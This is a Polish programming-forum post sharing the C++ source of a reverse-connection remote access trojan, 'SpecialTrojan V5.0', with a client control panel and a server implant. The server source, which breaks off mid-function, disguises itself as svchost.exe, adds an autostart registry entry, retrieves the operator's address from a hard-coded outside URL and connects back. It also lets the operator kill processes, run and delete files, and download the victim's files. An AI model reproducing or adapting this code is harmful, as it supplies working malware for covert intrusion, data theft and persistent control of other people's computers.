[C++] Trojan/RAT w architekturze klient-serwer

Zbiór ciekawych kodów źródłowych, skryptów i gotowców.
Regulamin forum
-Staraj się poprzedzać nazwę tematu prefiksem z nazwą języka programowania np. [Python] nazwa tematu.
-Wklejaj źródła w znaczniku

Kod: Zaznacz cały

[/b].
-Staraj się w skrócie opisać do czego dane źródło służy.
[b]-Zawsze podaj stronę domową autora (jeśli znasz te informacje)[/b]. Szanujemy cudzą prace!
Awatar użytkownika
F3nix
Posty: 332
Rejestracja: 28 kwie 2015, 20:51

[C++] Trojan/RAT w architekturze klient-serwer

Post autor: F3nix »

Kolejny z odmętów starego dysku kod źródłowy nie mojego autorstwa napisany w C++. Jest to typowy pierwszy trojan / RAT / backdoor, który raczej każdy kiedyś sobie napisał (klient-serwer). Działa na socketach i oczywiście jakby mogło nie zabraknąć w tamtych czasach... posiada funkcje sterowania tacką CD-ROMU... :lol: Jako że widzę tam bibliotekę wininet.h to mogę się tylko domyślać jego wykrywalności...

Info od autora
Author: crAcker


Here is it my Version 5.0 of SpecialTrojan.
That will be my last version of SpecialTrojan i posted here.
It's using a reverse connection.
Credits to: %ebx
I hope it will be useful for some of you.
The code is a bit ugly , but you know already about my desktop.. so you dont need to wait more from me. The FileTransfer function is from %ebx, thanks alot to him, its working really perfect.., i added a search function too, so u can search file's then download any file you want.

P.S: just download function is inserted not upload, so you just can get file's from ur victim.. not send.
Klient

Kod: Zaznacz cały

#include <windows.h>
#include <stdio.h>

#define File 100
#define About 101
#define GetProcesses 1
#define GetFiles 2
#define Refrsh 3
#define ProcS 4
#define Kill 5
#define Download 6
#define FPath 7
#define FileBox 8
#define GetWindow 9
#define Close 10
#define Exec 11
#define Remv 12
#define ExecP 13
#define RemvP 14
#define OpenCD 15
#define CloseCD 16
#define RemoveS 17
#define SPserver 21

HWND WindowProcs;
HWND WindowFiles;
HWND Refresh;
HWND ProcessesBox;
HWND Terminate;
HWND DownLoad;
HWND FilePath;
HWND FilesBox;
HWND GetWindowTitle;
HWND CloseW;
HWND Execute;
HWND Remove;
HWND ExecPath;
HWND RemovePath;
HWND CDopen;
HWND CDclose;
HWND RemoveServer;
HWND WindowTitle;
HWND StopServer;

HANDLE SOCK;
HANDLE Procs;
HANDLE FileS;
HANDLE RecvProc;
HANDLE RecvFiles;

WSADATA wsadata;
SOCKET client, server;

char szClassName[ ] = "SpecialTrojan";
char Text[16] = "Copyright: Onur";
char Command[200];
char Data[260];
char Ready[10];
char Buff[2000000];
int Cursel;
char DFile[50];
char* header[4096];    
char recvBUFF[4096];    
char* filename, * filesize;    
FILE * recvFILE;    
int received = 0;    
char tempstr[4096];    
int count1=1, count2=1, percent;
char LocalFP[MAX_PATH];
char RemoteFP[MAX_PATH];
char check[50];

HANDLE Recv;

int parseARGS(char **args, char *line)
{
    int tmp=0;args[tmp] = strtok( line, ":" );
    while((args[++tmp] = strtok(NULL, ":" ) ) != NULL );
    return tmp - 1;
}

DWORD WINAPI RecvFile(LPVOID)
{    
    if(recv(server, recvBUFF, sizeof(recvBUFF), 0) )
    {            
    if(!strncmp(recvBUFF,"FBEGIN",6)) 
    {
    recvBUFF[strlen(recvBUFF) - 2] = 0;                
    parseARGS(header, recvBUFF);                
    filename = header[1];                
    filesize = header[2];            
    }        
    recvBUFF[0] = 0;            
    recvFILE = fopen (filename,"wb");
    percent = atoi( filesize ) / 100;  
    
    while(!feof(recvFILE))
    {                
    if(recv(server, recvBUFF, 1, 0) != 0 ) 
    {
    if(fwrite(recvBUFF , sizeof(recvBUFF[0]) , 1 , recvFILE) == ERROR)
    {
    MessageBox(NULL, "Error writing file !", "Error", MB_OK | MB_ICONERROR);
    TerminateThread(Recv, 0);
    }  
    
    if(count1 == count2) 
    {                        
    printf("33[0;0H"); //move cursor to 0, 0                        
    printf( "\33[2J"); //clear line                        
    printf("Filename: %s\n", filename);                        
    printf("Filesize: %d Kb\n", atoi(filesize) / 1024);                        
    printf("Percent : %d%% ( %d Kb)\n",count1 / percent ,count1 / 1024);                        
    count1+=percent;                    
    }                    
    count2++;                   
    received++;                    
    recvBUFF[0] = 0;            
    }
    }  
    } 
}

BOOL EDbleWindow(BOOL b)
{
     EnableWindow(WindowProcs, b);
     EnableWindow(WindowFiles, b);
     EnableWindow(GetWindowTitle, b);
     EnableWindow(CloseW, b);
     EnableWindow(Execute, b);
     EnableWindow(Remove, b);
     EnableWindow(ExecPath, b);
     EnableWindow(RemovePath, b);
     EnableWindow(CDopen, b);
     EnableWindow(CDclose, b);
     EnableWindow(RemoveServer, b);
     EnableWindow(StopServer, b);
}

DWORD WINAPI WinSock(LPVOID)
{
      if(WSAStartup(MAKEWORD(2, 2), &wsadata) != 0)
      {
      MessageBox(NULL, "Error by initialization !", "Initialization Failed", MB_OK | MB_ICONERROR);
      WSACleanup();
      exit(0);
      }
      
      client = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
      
      if(client == INVALID_SOCKET)
      {
      MessageBox(NULL, "Error by creating socket !", "Socket Error", MB_OK | MB_ICONERROR);
      WSACleanup();
      closesocket(client), (server);
      exit(0);
      }
      
      struct sockaddr_in cln;
      
      cln.sin_port=htons(80);
      cln.sin_addr.s_addr=INADDR_ANY;
      cln.sin_family=AF_INET;
      
      if(bind(client, (sockaddr*)&cln, sizeof(cln)) != 0)
      {
      MessageBox(NULL, "Error by bind socket !", "Bind Error", MB_OK | MB_ICONERROR);
      }
      
      int clnt = sizeof(cln);
      
      listen(client, 0);
      server = accept(client, (sockaddr*)&client, &clnt);
      EDbleWindow(true);
      MessageBox(NULL, "Connected !", "Connected", MB_OK | MB_ICONINFORMATION);
      TerminateThread(SOCK, 0);
}

DWORD WINAPI RecvProcesses(LPVOID)
{
      SendMessage(ProcessesBox, LB_RESETCONTENT, 0, 0);
      send(server, Ready, sizeof(Ready), 0);
      while(recv(server, Data, 200, 0))
      {
      if(!strcmp(Data, "finished"))
      {
      TerminateThread(RecvProc, 0);
      }

      else if(!strcmp(Data, "Successfully"))
      {
      }
      
      else if(!strcmp(Data, "Error"))
      {
      }
      
      else if(!strcmp(Data, ""))
      {
      }

      else
      SendMessage(ProcessesBox, LB_INSERTSTRING, (WPARAM)-1, (LPARAM)Data);
      send(server, Ready, sizeof(Ready), 0);
      }
}

DWORD WINAPI RecvFileS(LPVOID)
{
      SendMessage(FilesBox, LB_RESETCONTENT, 0, 0);
      
      while(recv(server, Data, sizeof(Data), 0))
      {
      if(!strcmp(Data, ""))
      {}
      
      if(!strcmp(Data, "Error"))
      {
      MessageBox(NULL, "Error getting file's !", "Error", MB_OK | MB_ICONERROR);
      strcpy(Data, "");
      TerminateThread(RecvFiles, 0);
      }
      
      if(!strcmp(Data, "finished"))
      {
      strcpy(Data, "");
      TerminateThread(RecvFiles, 0);
      }
      
      else
      {
      SendMessage(FilesBox, LB_INSERTSTRING, (WPARAM)-1, (LPARAM)Data);
      send(server, Ready, sizeof(Ready), 0);
      }
      }
}

LRESULT CALLBACK Processes (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    switch (message)
    {
    case WM_DESTROY:
    TerminateThread(RecvProc, 0);
    strcpy(Data, "");
    PostQuitMessage (0);
    break;
    
    case WM_CREATE:
    CreateWindowEx(0, "Button", "Refresh", WS_VISIBLE | WS_CHILD | WS_BORDER, 23, 10, 70, 20, hwnd, (HMENU)Refrsh, 0, NULL);
    CreateWindowEx(0, "Button", "Kill", WS_VISIBLE | WS_CHILD | WS_BORDER, 120, 10, 70, 20, hwnd, (HMENU)Kill, 0, NULL);
    ProcessesBox = CreateWindowEx(0, "ListBox", 0, WS_VISIBLE | WS_CHILD | WS_BORDER | WS_VSCROLL | LBS_DISABLENOSCROLL, 15, 35, 183, 235, hwnd, (HMENU)ProcS, 0, NULL);
    break;
    
    case WM_COMMAND:
    switch(LOWORD(wParam))
    {
    case Refrsh:
    strcpy(Command, "GetProcesses");
    send(server, Command, 20, 0);
    TerminateThread(RecvProc, 0);
    RecvProc = CreateThread(NULL, 0, RecvProcesses, 0, 0, NULL);
    break;
    
    case Kill:
    if(MessageBox(NULL, "Are you sure, you want to terminate the process ?", "Terminate Process", MB_YESNO | MB_ICONQUESTION) == IDYES)
    {                   
    strcpy(Command, "Kill");
    send(server, Command, sizeof(Command), 0);

    Cursel = SendMessage(ProcessesBox, LB_GETCURSEL, 0, 0);
    SendMessage(ProcessesBox, LB_GETTEXT, (WPARAM)Cursel, (LPARAM)Data);

    send(server, Data, sizeof(Data), 0);
    recv(server, Data, sizeof(Data), 0);
    
    if(!strcmp(Data, "Error"))
    {
    MessageBox(NULL, "Error by killig process !", "Error", MB_OK | MB_ICONERROR);
    }
    
    else
    {
    SendMessage(ProcessesBox, LB_DELETESTRING, (WPARAM)Cursel, 0);
    MessageBox(NULL, "Process killed succesfully !", "Process Killed", MB_OK | MB_ICONINFORMATION);
    }
    }
    break;
    }
    
    default:
    return DefWindowProc (hwnd, message, wParam, lParam);
    }
}

DWORD WINAPI PWindow(LPVOID)
{
    HWND hwnd;
    MSG messages;
    WNDCLASSEX wincl;

    wincl.hInstance = 0;
    wincl.lpszClassName = "Processes";
    wincl.lpfnWndProc = Processes;
    wincl.style = CS_DBLCLKS;
    wincl.cbSize = sizeof (WNDCLASSEX);

    wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
    wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);
    wincl.hCursor = LoadCursor (NULL, IDC_ARROW);
    wincl.lpszMenuName = NULL;
    wincl.cbClsExtra = 0;
    wincl.cbWndExtra = 0;
    wincl.hbrBackground = (HBRUSH) COLOR_BACKGROUND+4;

    RegisterClassEx(&wincl);

    hwnd = CreateWindowEx (
           0,
           "Processes",
           "Processes",
           WS_SYSMENU | WS_VISIBLE,
           CW_USEDEFAULT,
           CW_USEDEFAULT,
           220,
           300,
           HWND_DESKTOP,
           NULL,
           0,
           NULL
           );

    while (GetMessage (&messages, NULL, 0, 0))
    {
        TranslateMessage(&messages);
        DispatchMessage(&messages);
    }
}

LRESULT CALLBACK Files (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    switch (message)
    {
    case WM_DESTROY:
    TerminateThread(Recv, 0), TerminateThread(RecvFiles, 0);
    if(!strcmp(check, "DownloadAktiv"))
    {
    fclose(recvFILE);
    strcpy(check, "");
    }
    PostQuitMessage (0);
    break;
    
    case WM_CREATE: 
    CreateWindowEx(0, "Button", "Get Files", WS_VISIBLE | WS_CHILD | WS_BORDER, 8, 10, 80, 20, hwnd, (HMENU)GetFiles, 0, NULL);
    CreateWindowEx(0, "Button", "Download", WS_VISIBLE | WS_CHILD | WS_BORDER, 125, 10, 80, 20, hwnd, (HMENU)Download, 0, NULL);
    CreateWindowEx(0, "Edit", "C:\\WINDOWS\\*.txt", WS_VISIBLE | WS_CHILD | WS_BORDER | ES_AUTOHSCROLL, 8, 35, 197, 18, hwnd, (HMENU)FPath, 0, NULL);
    FilesBox = CreateWindowEx(0, "ListBox", 0, WS_VISIBLE | WS_CHILD | WS_BORDER | WS_VSCROLL | LBS_DISABLENOSCROLL, 8, 57, 198, 209, hwnd, (HMENU)FileBox, 0, NULL);
    break;
    
    case WM_COMMAND:
    switch(LOWORD(wParam))
    {
    case GetFiles:
    strcpy(Command, "GetFiles");
    send(server, Command, 20, 0);
    GetDlgItemText(hwnd, FPath, Data, sizeof(Data));
    send(server, Data, sizeof(Data), 0);
    TerminateThread(RecvFiles, 0);
    RecvFiles = CreateThread(NULL, 0, RecvFileS, 0, 0, NULL);
    break;

    case Download:
    strcpy(Command, "Download");
    send(server, Command, 20, 0);
    strcpy(check, "DownloadAktiv");
    Cursel = SendMessage(FilesBox, LB_GETCURSEL, 0, 0);
    SendMessage(FilesBox, LB_GETTEXT, (WPARAM)Cursel, (LPARAM)DFile);
    GetDlgItemText(hwnd, FPath, Data, sizeof(Data));
    
    if(!strcmp(Data, ""))
    {
    strcpy(Data, "Error");
    send(server, Data, 8, 0);
    MessageBox(NULL, "You doesn't typed the path of the file to download !", "Donwload", MB_OK | MB_ICONWARNING);
    TerminateThread(FileS, 0);
    }
    
    if(!strcmp(DFile, ""))
    {
    strcpy(Data, "Error");
    send(server, Data, 8, 0);
    MessageBox(NULL, "You doesn't selected a file to download !", "Download", MB_OK | MB_ICONWARNING);
    TerminateThread(FileS, 0);
    }
    
    send(server, Data, sizeof(Data), 0);
    Sleep(10);
    send(server, DFile, sizeof(DFile), 0);
    
    Recv = CreateThread(NULL, 0, RecvFile, 0, 0, NULL);
    break;
    }
    
    default:
    return DefWindowProc (hwnd, message, wParam, lParam);
    }
}

DWORD WINAPI FWindow(LPVOID)
{
    HWND hwnd;
    MSG messages;
    WNDCLASSEX wincl;

    wincl.hInstance = 0;
    wincl.lpszClassName = "Files";
    wincl.lpfnWndProc = Files;
    wincl.style = CS_DBLCLKS;
    wincl.cbSize = sizeof (WNDCLASSEX);

    wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
    wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);
    wincl.hCursor = LoadCursor (NULL, IDC_ARROW);
    wincl.lpszMenuName = NULL;
    wincl.cbClsExtra = 0;
    wincl.cbWndExtra = 0;
    wincl.hbrBackground = (HBRUSH) COLOR_BACKGROUND+4;

    RegisterClassEx(&wincl);

    hwnd = CreateWindowEx (
           0,
           "Files",
           "Files",
           WS_SYSMENU | WS_VISIBLE,
           CW_USEDEFAULT,
           CW_USEDEFAULT,
           220,
           292,
           HWND_DESKTOP,
           NULL,
           0,
           NULL
           );

    while (GetMessage (&messages, NULL, 0, 0))
    {
        TranslateMessage(&messages);
        DispatchMessage(&messages);
    }
}

LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);

int WINAPI WinMain (HINSTANCE hThisInstance,
                    HINSTANCE hPrevInstance,
                    LPSTR lpszArgument,
                    int nFunsterStil)

{
    SOCK = CreateThread(NULL, 0, WinSock, 0, 0, NULL);
    
    HWND hwnd;
    MSG messages;
    WNDCLASSEX wincl;

    wincl.hInstance = hThisInstance;
    wincl.lpszClassName = szClassName;
    wincl.lpfnWndProc = WindowProcedure;
    wincl.style = CS_DBLCLKS;
    wincl.cbSize = sizeof (WNDCLASSEX);

    wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
    wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);
    wincl.hCursor = LoadCursor (NULL, IDC_ARROW);
    wincl.lpszMenuName = NULL;
    wincl.cbClsExtra = 0;
    wincl.cbWndExtra = 0;
    wincl.hbrBackground = (HBRUSH) COLOR_BACKGROUND+4;

    if (!RegisterClassEx (&wincl))
        return 0;

    hwnd = CreateWindowEx (
           0,
           szClassName,
           "SpecialTrojan V 5.0",
           WS_SYSMENU | WS_MINIMIZEBOX,
           CW_USEDEFAULT,
           CW_USEDEFAULT,
           250,
           300,
           HWND_DESKTOP,
           NULL,
           hThisInstance,
           NULL
           );

    ShowWindow (hwnd, nFunsterStil);

    while (GetMessage (&messages, NULL, 0, 0))
    {
        TranslateMessage(&messages);
        DispatchMessage(&messages);
    }

    return messages.wParam;
}


LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    HMENU hMenu;
    HMENU hMenuInfo1;
    HMENU hMenuInfo2;
        
    PAINTSTRUCT ps;
    HDC hdc;
        
    switch (message)
    {
    case WM_DESTROY:
    strcpy(Command, "bye");
    send(server, Command, 8, 0);
    PostQuitMessage (0);
    break;
    
    case WM_PAINT:
    hdc = BeginPaint(hwnd, &ps);
    
    TextOut(hdc, 133, 223, Text, sizeof(Text) - 1);
    EndPaint(hwnd, &ps) ;
    break;
    
    case WM_CREATE:       
    hMenu = CreateMenu();
    hMenuInfo1 = CreateMenu();
    hMenuInfo2 = CreateMenu();
    AppendMenu(hMenuInfo1, MF_STRING, File, "Exit");
    AppendMenu(hMenu, MF_POPUP, (UINT) hMenuInfo1, "File");
    AppendMenu(hMenuInfo2, MF_STRING, About, "About");
    AppendMenu(hMenu, MF_POPUP, (UINT) hMenuInfo2, "Info");
    SetMenu(hwnd, hMenu);
         
    WindowProcs = CreateWindowEx(0, "Button", "Processes", WS_VISIBLE | WS_CHILD | WS_BORDER, 10, 5, 80, 22, hwnd, (HMENU)GetProcesses, 0, NULL);
    WindowFiles = CreateWindowEx(0, "Button", "Files", WS_VISIBLE | WS_CHILD | WS_BORDER, 153, 5, 80, 22, hwnd, (HMENU)GetFiles, 0, NULL);
    GetWindowTitle = CreateWindowEx(0, "Button", "Get Window", WS_VISIBLE | WS_CHILD | WS_BORDER, 73, 35, 95, 22, hwnd, (HMENU)GetWindow, 0, NULL);
    WindowTitle = CreateWindowEx(0, "Edit", 0, WS_VISIBLE | WS_CHILD | WS_BORDER | ES_READONLY, 7, 58, 230, 18, hwnd, 0, 0, NULL);
    CloseW = CreateWindowEx(0, "Button", "Close", WS_VISIBLE | WS_CHILD | WS_BORDER, 73, 78, 95, 22, hwnd, (HMENU)Close, 0, NULL);
    Execute = CreateWindowEx(0, "Button", "Execute", WS_VISIBLE | WS_CHILD | WS_BORDER, 10, 105, 65, 22, hwnd, (HMENU)Exec, 0, NULL);
    Remove = CreateWindowEx(0, "Button", "Remove", WS_VISIBLE | WS_CHILD | WS_BORDER, 10, 155, 65, 22, hwnd, (HMENU)Remv, 0, NULL);
    ExecPath = CreateWindowEx(0, "Edit", 0, WS_VISIBLE | WS_CHILD | WS_BORDER | ES_AUTOHSCROLL, 10, 130, 150, 18, hwnd, (HMENU)ExecP, 0, NULL);
    RemovePath = CreateWindowEx(0, "Edit", 0, WS_VISIBLE | WS_CHILD | WS_BORDER | ES_AUTOHSCROLL, 10, 180, 150, 18, hwnd, (HMENU)RemvP, 0, NULL);
    CDopen = CreateWindowEx(0, "Button", "Open CD", WS_VISIBLE | WS_CHILD | WS_BORDER, 167, 118, 72, 22, hwnd, (HMENU)OpenCD, 0, NULL);
    CDclose = CreateWindowEx(0, "Button", "Close CD", WS_VISIBLE | WS_CHILD | WS_BORDER, 167, 155, 72, 22, hwnd, (HMENU)CloseCD, 0, NULL);
    StopServer = CreateWindowEx(0, "Button", "Stop Server", WS_VISIBLE | WS_CHILD | WS_BORDER, 10, 200, 100, 22, hwnd, (HMENU)SPserver, 0, NULL);
    RemoveServer = CreateWindowEx(0, "Button", "Remove Server", WS_VISIBLE | WS_CHILD | WS_BORDER, 10, 220, 115, 25, hwnd, (HMENU)RemoveS, 0, NULL);
    
    EDbleWindow(false);
    break;

    case WM_COMMAND:
         
    switch(LOWORD(wParam))
    {
    if(HIWORD(wParam) == 0) 
    { 
    case File:
    strcpy(Command, "bye");
    send(server, Command, 5, 0);
    PostQuitMessage(0);
    break;
    
    case About:
    MessageBox(NULL, "SpecialTrojan Version 5.0\nRemote Access Trojan® -2007\n\nCopyright© : Onur\n\ncontact: mafiaonur@yahoo.de", "About", MB_OK | MB_ICONINFORMATION);
    break;
    }

    case GetProcesses:
    TerminateThread(Procs, 0);
    Procs = CreateThread(NULL, 0, PWindow, 0, 0, NULL);
    TerminateThread(RecvProc, 0);
    RecvProc = CreateThread(NULL, 0, RecvProcesses, 0, 0, NULL);
    strcpy(Command, "GetProcesses");
    send(server, Command, 20, 0);
    break;
    
    case GetFiles:
    TerminateThread(FileS, 0);
    FileS = CreateThread(NULL, 0, FWindow, 0, 0, NULL);
    break;
    
    case GetWindow: 
    strcpy(Command, "GetWindow");
    send(server, Command, 15, 0);
    recv(server, Data, sizeof(Data), 0);
    SetWindowText(WindowTitle, Data);
    break;
    
    case Close:
    strcpy(Command, "CloseWindow");
    send(server, Command, 20, 0);
    MessageBox(NULL, "Current window closed !", "Close Window", MB_OK | MB_ICONINFORMATION);
    break;
    
    case Exec:
    strcpy(Command, "Execute");
    send(server, Command, 15, 0);
    GetDlgItemText(hwnd, ExecP, Data, sizeof(Data));
    if(!strcmp(Data, ""))
    {
    MessageBox(NULL, "Execute path is empty !", "Execute", MB_OK | MB_ICONWARNING);
    send(server, Data, 10, 0);
    }
    
    else
    {
    send(server, Data, sizeof(Data), 0);
    MessageBox(NULL, "File executed !", "Execute", MB_OK | MB_ICONINFORMATION);
    }
    break;
    
    case Remv:
    strcpy(Command, "Remove");
    send(server, Command, 15, 0);
    GetDlgItemText(hwnd, RemvP, Data, sizeof(Data));
    if(!strcmp(Data, ""))
    {
    MessageBox(NULL, "Remove path is empty !", "Remove", MB_OK | MB_ICONINFORMATION);
    send(server, Data, sizeof(Data), 0);
    }
    
    else
    {
    send(server, Data, sizeof(Data), 0);
    recv(server, Data, 20, 0);
    if(!strcmp(Data, "Error"))
    {
    MessageBox(NULL, "Error by removing file !", "Remove", MB_OK | MB_ICONWARNING);
    }
    
    else
    {
    MessageBox(NULL, "File removed successfully !", "Remove", MB_OK | MB_ICONINFORMATION);
    }
    }
    break;
    
    case OpenCD:
    strcpy(Command, "OpenCD");
    send(server, Command, 10, 0);
    MessageBox(NULL, "CD-ROM opened !", "CD-ROM", MB_OK | MB_ICONINFORMATION);
    break;
    
    case CloseCD:
    strcpy(Command, "CloseCD");
    send(server, Command, 10, 0);
    MessageBox(NULL, "CD-ROM closed !", "CD-ROM", MB_OK | MB_ICONINFORMATION);
    break;
    
    case SPserver:
    strcpy(Command, "stop");
    send(server, Command, 10, 0);
    EDbleWindow(false);
    MessageBox(NULL, "Server stopped !", "Stop Server", MB_OK | MB_ICONINFORMATION);
    break;
    
    case RemoveS:
    strcpy(Command, "Uninstall");
    send(server, Command, 20, 0);
    recv(server, Data, 20, 0);
    
    if(!strcmp(Data, "Error"))
    {
    MessageBox(NULL, "Failed to remove the server !", "Remove Server", MB_OK | MB_ICONWARNING);
    }
    
    else
    {
    EDbleWindow(false);
    TerminateThread(SOCK, 0);
    TerminateThread(Procs, 0);
    TerminateThread(FileS, 0);
    TerminateThread(RecvProc, 0);
    TerminateThread(RecvFiles, 0);
    TerminateThread(Recv, 0);
    MessageBox(NULL, "Server removed successfully !", "Remove Server", MB_OK | MB_ICONINFORMATION);
    }
    break;
    }
    
    default:
    return DefWindowProc (hwnd, message, wParam, lParam);
    }

    return 0;
}
Serwer

Kod: Zaznacz cały

#include <windows.h>
#include <wininet.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <vector>
#include <string>
#define backlog 1
using namespace std;

BOOL KillProcessByName(char *szProcessToKill);

typedef BOOL (WINAPI *TH32_PROCESS)  
             (HANDLE hSnapShot, LPPROCESSENTRY32 lppe); 
              
static TH32_PROCESS pProcess32First = NULL;  
static TH32_PROCESS pProcess32Next = NULL; 

HINTERNET hInet2, hFtp2;

char Server[MAX_PATH];
char ServerDir[MAX_PATH];
char Command[200];
char Data[260];
char IP[20];
DWORD size;
char Ready[20];
char DFile[50];
char* header[4096];    
char recvBUFF[4096];    
char* filename, * filesize;    
FILE * recvFILE;    
int received = 0;    
char tempstr[4096];    
int count1=1, count2=1, percent;

WSADATA wsadata;
SOCKET client, server;  

int fileSEND(char *lfile, char *rfile)
{   
    FILE * file_to_send;    
    int ch;    
    char toSEND[1];    
    char remoteFILE[4096];    
    int count1=1,count2=1, percent;        
 
    file_to_send = fopen(lfile,"rb");    
     
    long fileSIZE;    
    fseek(file_to_send, 0, SEEK_END);
    fileSIZE =ftell (file_to_send);    
    rewind(file_to_send);    
    sprintf(remoteFILE, "FBEGIN:%s:%d\r\n", rfile, fileSIZE);    
    send(client, remoteFILE, sizeof(remoteFILE), 0);    
    percent = fileSIZE / 100;    
    while((ch=getc(file_to_send))!=EOF)
    {
    toSEND[0] = ch;        
    send(client, toSEND, 1, 0);        
    if( count1 == count2) 
    {            
    printf("33[0;0H");            
    printf( "\33[2J");            
    printf("Filename: %s\n", lfile);            
    printf("Filesize: %d Kb\n", fileSIZE / 1024);            
    printf("Percent : %d%% ( %d Kb)\n",count1 / percent ,count1 / 1024);            
    count1+=percent;        
    }        
    count2++;    
    }     
    fclose(file_to_send); 
    return 0;
}

int parseARGS(char **args, char *line)
{
    int tmp=0;args[tmp] = strtok( line, ":" );
    while((args[++tmp] = strtok(NULL, ":" ) ) != NULL );
    return tmp - 1;
}

void StartUp()
{
     HMODULE GetModH = GetModuleHandle(NULL);
     
     GetModuleFileName(GetModH, Server, sizeof(Server));
     GetSystemDirectory(ServerDir, sizeof(ServerDir));
     
     strcat(ServerDir, "\\win32");
     CreateDirectory(ServerDir, 0);
     strcat(ServerDir, "\\svchost.exe");
     
     if(!strcmp(Server, ServerDir))
     {
     goto key;
     }
     
     else
     {   
     CopyFile(Server, ServerDir, 0);
     }
     
     key:
     
     HKEY hKey;
     
     RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey);
     RegSetValueEx(hKey, "Generic Host Process for Win32 Services", 0, REG_SZ,(const unsigned char*)ServerDir, sizeof(ServerDir));
     RegCloseKey(hKey);
}

void RecvCommands()
{
     while(1)
     {
     recv(client, Command, sizeof(Command), 0);
     
     if(!strcmp(Command, "bye"))
     {
     WSACleanup();
     closesocket(client);
     Sleep(200);
     
     TryAgain:
     
     closesocket(client), (server);
                    
     Sleep(5000);
      
     HINTERNET hInet = InternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
     
     if(hInet == NULL)
     {
     InternetCloseHandle(hInet);
     goto TryAgain;
     }
     
     /* Edit the url, u need to give the url of ur ip !!! */
     
     HINTERNET hFile = InternetOpenUrl(hInet, "http://hackerswelcome.ha.funpic.de/ip.txt", NULL, 0, 0, 0);
     
     InternetReadFile(hFile, IP, 20, &size);
     
     InternetCloseHandle(hInet), (hFile);
     
     if(WSAStartup(MAKEWORD(2, 2), &wsadata) != 0)
     {
     WSACleanup();
     goto TryAgain;
     }
     
     client = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
     
     if(client == INVALID_SOCKET)
     {
     WSACleanup();
     closesocket(client);
     goto TryAgain;
     }
     
     sockaddr_in clnt;
     
     clnt.sin_port=htons(80);
     clnt.sin_addr.s_addr=inet_addr(IP);
     clnt.sin_family=AF_INET;
                  
     if(connect(client,(sockaddr*)&clnt, sizeof(clnt)) == SOCKET_ERROR)
     {
     WSACleanup();
     closesocket(client), (server);
     goto TryAgain;
     }
     }
     
     if(!strcmp(Command, "GetProcesses"))
     {
     recv(client, Ready, sizeof(Ready), 0);
     
     PROCESSENTRY32 pe32 = {0}; 
     HANDLE hSnapshot = NULL; 
     HINSTANCE hDll = LoadLibrary("kernel32.dll"); 
        
     pProcess32First=(TH32_PROCESS)GetProcAddress(hDll, "Process32First"); 
     pProcess32Next=(TH32_PROCESS)GetProcAddress(hDll, "Process32Next"); 
         
     hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);               
     if(hSnapshot != (HANDLE) -1) 
     { 
     pe32.dwSize = sizeof(PROCESSENTRY32); 
     int proc_cnt = 0, thrd_cnt = 0;
          
     if(pProcess32First(hSnapshot, &pe32)) 
     { 
     do 
     { 
     strcpy(Data, pe32.szExeFile);
     send(client, Data, 200, 0);
     recv(client, Ready, sizeof(Ready), 0);
     }  
     while(pProcess32Next(hSnapshot, &pe32)); 
     CloseHandle(hSnapshot);
     }
     }
     strcpy(Data, "finished");
     send(client, Data, 200, 0);
     }
     
     if(!strcmp(Command, "Kill"))
     {
     recv(client, Data, sizeof(Data), 0);
     KillProcessByName(Data);
     }
     
     if(!strcmp(Command, "Execute"))
     {
     recv(client, Data, sizeof(Data), 0);
     ShellExecute(NULL, NULL, Data, NULL, NULL, SW_SHOW);
     }
     
     if(!strcmp(Command, "Remove"))
     {
     recv(client, Data, sizeof(Data), 0);
     if(DeleteFile(Data) == ERROR)
     {
     strcpy(Data, "Error");
     send(client, Data, 10, 0);
     }
     
     else
     {
     strcpy(Data, "Succesfully");
     send(client, Data, 20, 0);
     }
     }
     
     if(!strcmp(Command, "OpenCD"))
     {
     mciSendString("set CDAudio door open", NULL, 0, NULL);
     }
     
     if(!strcmp(Command, "CloseCD"))
     {
     mciSendString("set CDAudio door closed", NULL, 0, NULL);
     }
     
     if(!strcmp(Command, "CloseWindow"))
     {
     HWND Window = GetForegroundWindow();
     SendMessage(Window, WM_CLOSE, 0, 0);
     }
     
     if(!strcmp(Command, "GetWindow"))
     {
     HWND Window = GetForegroundWindow();
     GetWindowText(Window, Data, MAX_PATH);
     send(client, Data, sizeof(Data), 0);
     }
     
     if(!strcmp(Command, "Uninstall"))
     {
     HKEY hKey;
     
     RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey);  
     if(RegDeleteValue(hKey, "Generic Host Process for Win32 Services") != ERROR)
     {
     strcpy(Data, "Error");
     send(client, Data, 10, 0);
     }
     
     else
     {
     strcpy(Data, "Succesfully");
     send(client, Data, 20, 0);
     WSACleanup();
     closesocket(server), (client);
     exit(0);
     }
     }
     
     if(!strcmp(Command, "GetFiles"))
     {
     recv(client, Data, sizeof(Data), 0);
     
     std::vector<std::string> dir; 
     WIN32_FIND_DATA data; 
     HANDLE hFile = FindFirstFileA(Data, &data); 
     
     if(hFile == INVALID_HANDLE_VALUE) 
     {
     strcpy(Data, "Error");
     send(client, Data, sizeof(Data), 0);
     }
     
     do{
     
     if(data.dwFileAttributes)
     {
     strcpy(Data, data.cFileName);
     send(client, Data, sizeof(Data), 0);
     recv(client, Ready, sizeof(Ready), 0);
     dir.push_back(std::string(data.cFileName));
     }
     }
     while(FindNextFile(hFile, &data));
     strcpy(Data, "finished");
     send(client, Data, sizeof(Data), 0);
     }
     
     if(!strcmp(Command, "Download"))
     {
     recv(client, Data, sizeof(Data), 0);
